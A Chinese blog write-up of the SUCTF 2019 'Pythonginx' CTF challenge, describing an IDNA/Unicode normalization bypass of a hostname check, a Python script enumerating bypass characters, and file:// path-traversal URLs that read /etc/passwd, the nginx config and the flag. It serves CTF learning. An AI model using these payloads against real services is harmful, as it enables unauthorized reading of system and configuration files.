SUCTF2019-Pythonginx

于 2021-04-24 01:39:32 发布
阅读量235 收藏 1
点赞数
分类专栏: CTF Reverse 文章标签: nginx linux url centos python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/116079631
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
Reverse
2 篇文章 0 订阅
订阅专栏

打开靶机,经典给源码

CTRL+U看起来舒服点

3个if都是一样的,但是host在变,我们需要进入第三个if

这题经大佬指点得知使用的blackhat议题里的一个点,这是blackhat PPT链接:https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

大致意思是当URL 中出现一些特殊字符的时候,输出的结果可能不在预期

偷的脚本查看可用字符

from urllib.parse import urlunsplit, urlsplit
from urllib import parse


def get_unicode():
    for x in range(65536):
        uni = chr(x)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: " + uni + ' unicode: \\u' + str(hex(x))[2:])
        except:
            pass


def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False


if __name__ == '__main__':
    get_unicode()

结果如下

我们只需要用结果中任意一个去读取文件就行,如

/getUrl?url=file://suctf.c%E2%84%82/../../../../../etc/passwd

题目提示我们是nginx,所以我们去读取nginx的配置文件

这里读的路径是 /usr/local/nginx/conf/nginx.conf

/getUrl?url=file://suctf.c%E2%84%82/../../../../..//usr/local/nginx/conf/nginx.conf

结果如下

于是读取文件

/getUrl?url=file://suctf.c%E2%84%82/../../../../..//usr/fffffflag

得到flag

Tajang
关注
专栏目录
[SUCTF 2019]Pythonginx
夜幕下的灯火阑珊的博客
05-13 499
知识点 ssrf nginx配置文件 CVE-2019-10160:urlsplit NFKD 标准化漏洞 题目源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname #解析出主机名 if host == 'suctf.cc': return "我扌 your
[SUCTF 2019]Pythonginx(nginx相关配置,file协议,python代码审计)
weixin_44110537的博客
10-05 465
f12查看源代码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname#得到url和主机名 if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(url))
【学习笔记16】buu [SUCTF 2019]Pythonginx
weixin_43553654的博客
05-16 641
打开一看发现给了一堆代码这样看不方便我们就去查看源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == '...
BUUCTF-[SUCTF 2019]EasySQL1
最新发布
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值